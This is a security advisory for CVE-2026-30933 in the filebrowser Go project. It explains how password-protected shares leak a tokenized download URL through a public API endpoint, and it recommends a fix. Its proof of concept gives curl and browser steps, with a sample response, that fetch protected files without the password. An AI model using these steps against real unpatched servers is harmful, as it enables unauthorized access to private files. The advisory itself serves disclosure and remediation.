CVE-2026-30933

描述

### Summary The remediation for CVE-2026-27611 appears incomplete. Password protected shares still disclose tokenized downloadURL via /public/api/share/info in docker image gtstef/filebrowser:1.3.1-webdav-2. ### Details The issue stems from two flaws: 1. Tokenized download URLs are written into the persistent share model ``` backend/http/share.go convertToFrontendShareResponse(line 63) s.DownloadURL = getShareURL(r, s.Hash, true, s.Token) ``` 2. The public endpoint: ``` GET /public/api/share/info returns shareLink.CommonShare without clearing DownloadURL. ``` Since Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability. The previous patch removed token generation in one handler but did not address the persisted DownloadURL values/Public reflection of existing DownloadURL ### PoC 1. Create a password protected share as an authenticated user 2. Copy the public share URL (the clipboard WITHOUT an arrow) `http://yourdomain/public/share/yoursharedhash` Example: `http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw` 3. Query the public share endpoint via curl request: `curl 'http://yourdomain/public/api/share/info?hash=(your-share-hash)' -H 'Accept: */*' ` Example: `curl 'http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw' -H 'Accept: */*' ` Response includes: ``` { "shareTheme": "default", "title": "Shared files - test.md", "description": "A share has been sent to you to view or download.", "disableSidebar": false, "downloadURL": "http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D", "shareURL": "http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw", "enforceDarkLightMode": "default", "viewMode": "normal", "shareType": "normal", "sidebarLinks": [ { "name": "Share QR Code and Info", "category": "shareInfo", "target": "#", "icon": "qr_code" }, { "name": "Download", "category": "download", "target": "#", "icon": "download" }, { "name": "sourceLocation", "category": "custom", "target": "/srv/test.md", "icon": "" } ], "hasPassword": true, "disableLoginOption": false, "sourceURL": "/srv/test.md" } ``` Note the response "hasPassword": true and downloadURL includes token= parameter 4. Take the downloadURL(seen in json data response) and replace \u0026 with & and paste link into Incognito or private browser to ensure cookies are not interfering Example: `http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw&token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D` Browser downloads file immediately without requiring password ### Impact An unauthenticated attacker can retrieve password protected shared files without the password. Results in authentication bypass, unauthorized file access and confidentiality compromise ### Recommended Remediation Sanitize DownloadURL in public share info responses via `commonShare.DownloadURL = ""` before returning the json response in shareInfoHandler method located in backend/share.go Structural fix, only generate tokenized URLs after successful password validation

受影響套件(2)

• Go/github.com/gtsteffaniak/filebrowser/backendfrom 0, < 0.0.0-20260307130210-09713b32a5f6
• Go/github.com/gtsteffaniak/filebrowser/backendfrom 0, < 0.0.0-20260307130210-09713b32a5f6

CVSS 分數

參考連結(5)

• ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-30933
• PATCHhttps://github.com/gtsteffaniak/filebrowser
• WEBhttps://github.com/gtsteffaniak/filebrowser/releases/tag/v1.2.2-stable
• WEBhttps://github.com/gtsteffaniak/filebrowser/releases/tag/v1.3.1-beta
• WEBhttps://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-525j-95gf-766f